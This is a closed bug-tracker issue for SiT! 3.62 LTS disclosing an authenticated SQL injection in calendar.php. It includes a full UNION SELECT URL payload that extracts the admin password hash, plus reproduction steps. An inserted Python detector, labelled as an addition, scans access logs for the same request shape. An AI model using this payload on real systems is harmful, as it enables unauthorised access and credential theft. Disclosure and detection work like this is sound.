SiT! Bugs

ID: 0001395
Project: SiT!
Category: calendar
View Status: public
Date Submitted: 2010-09-08 15:28
Last Update: 2011-04-16 15:07
Reporter: Tomse
Assigned To: paulh
Priority: normal
Severity: major
Reproducibility: unable to reproduce
Status: closed
Resolution: fixed
Platform:
OS:
OS Version:
Product Version: 3.62 LTS
Target Version: 3.63 LTS
Fixed in Version: 3.63 LTS
Summary: 0001395: possible SQL injection

Description:
/calendar.php?display=list&type=1 union all select 1,2,3,4,5,6,7,8,9,10,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sit_users where id=1;--



I was given this line, it should extract the admin hash, I haven't been able to repro it.
Steps To Reproduce:
Login to sit as any user, paste the above URL modified to your system (don't forget the sit_users table)

this will list the user admin with the hashed password value in the users field.

I've been able to reproduce this, both in the 3.62 and SVN
Tags: security

-  Notes
(0003408)
kieran (administrator)
2010-09-11 13:44

Confirmed here.

(0003426)
ivan (administrator)
2010-10-09 11:24

I can confirm this too

(0003427)
paulh (administrator)
2010-10-09 11:27

yeap I've managed to repro and have a fix almost ready

(0003428)
paulh (administrator)
2010-10-09 11:32

r6693 and 58e5772 resolve this

This exploit is only available to authenticated users

(0003708)
ivan (administrator)
2011-04-16 13:21

http://www.autosectools.com/Advisories/Support.Incident.Tracker.3.62_Reflected.Cross-site.Scripting_132.html

(0003709)
ivan (administrator)
2011-04-16 13:23

Magpierss issue fixed in r7110 and Git 5d06e50

(0003714)
ivan (administrator)
2011-04-16 15:07

Fix Released in 3.63
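
A detection check for the request shape reported in this issue, as an added example that is not part of the tracker thread or SiT!'s own code: it scans web-server access-log lines for `calendar.php` requests whose `type` parameter is not a plain integer. The log format, the sample lines, `/other.php` and the function name are constructed assumptions, as is the premise that legitimate `type` values are short integers (the report shows `type=1`).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined-log style; not taken from the tracker.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Sep/2010:15:20:01 +0000] "GET /calendar.php?display=list&type=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [08/Sep/2010:15:21:44 +0000] "GET /calendar.php?display=list&type=1%20union%20all%20select%201,2 HTTP/1.1" 200 7342',
    '10.0.0.5 - - [08/Sep/2010:15:22:10 +0000] "GET /calendar.php?display=list&type=3 HTTP/1.1" 200 4981',
    '10.0.0.7 - - [08/Sep/2010:15:23:02 +0000] "GET /other.php?type=open HTTP/1.1" 200 2210',
]

# Greedy target match tolerates raw (unencoded) spaces inside the logged URL.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.+) HTTP/[\d.]+"')
# Assumption: legitimate values of the parameter are short decimal integers.
INT_RE = re.compile(r"[0-9]{1,9}")


def suspicious_calendar_requests(lines, path="/calendar.php", param="type"):
    """Return (line_number, decoded_value) for each request to `path`
    whose `param` value is anything other than a plain integer."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we can parse
        url = urlsplit(match.group("target"))
        # endswith() also covers installs under a sub-directory, e.g. /sit/
        if not url.path.endswith(path):
            continue
        # parse_qs percent-decodes and keeps every occurrence of a repeated key,
        # so a benign first value cannot hide a malformed second one.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not INT_RE.fullmatch(value):
                hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in suspicious_calendar_requests(SAMPLE_LOG):
        print(f"line {number}: non-integer type value {value!r}")
```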

- Issue History
Date Modified | Username | Field | Change
2010-09-08 15:28 | Tomse | New Issue |
2010-09-11 12:33 | Tomse | Description Updated |
2010-09-11 12:33 | Tomse | Steps to Reproduce Updated |
2010-09-11 12:35 | Tomse | Description Updated |
2010-09-11 13:44 | kieran | Note Added: 0003408 |
2010-09-11 13:44 | kieran | Assigned To | => kieran
2010-09-11 13:44 | kieran | Status | new => confirmed
2010-10-09 11:16 | paulh | Status | confirmed => assigned
2010-10-09 11:16 | paulh | Assigned To | kieran => paulh
2010-10-09 11:24 | ivan | Note Added: 0003426 |
2010-10-09 11:27 | paulh | Note Added: 0003427 |
2010-10-09 11:32 | paulh | Note Added: 0003428 |
2010-10-09 11:32 | paulh | Status | assigned => resolved
2010-10-09 11:32 | paulh | Resolution | open => fixed
2010-10-09 11:32 | paulh | Fixed in Version | => 3.63 LTS
2010-10-09 11:32 | paulh | Target Version | => 3.63 LTS
2010-10-09 11:32 | paulh | Tag Attached: security |
2011-04-16 13:21 | ivan | Note Added: 0003708 |
2011-04-16 13:23 | ivan | Note Added: 0003709 |
2011-04-16 13:23 | ivan | View Status | private => public
2011-04-16 15:07 | ivan | Note Added: 0003714 |
2011-04-16 15:07 | ivan | Status | resolved => closed

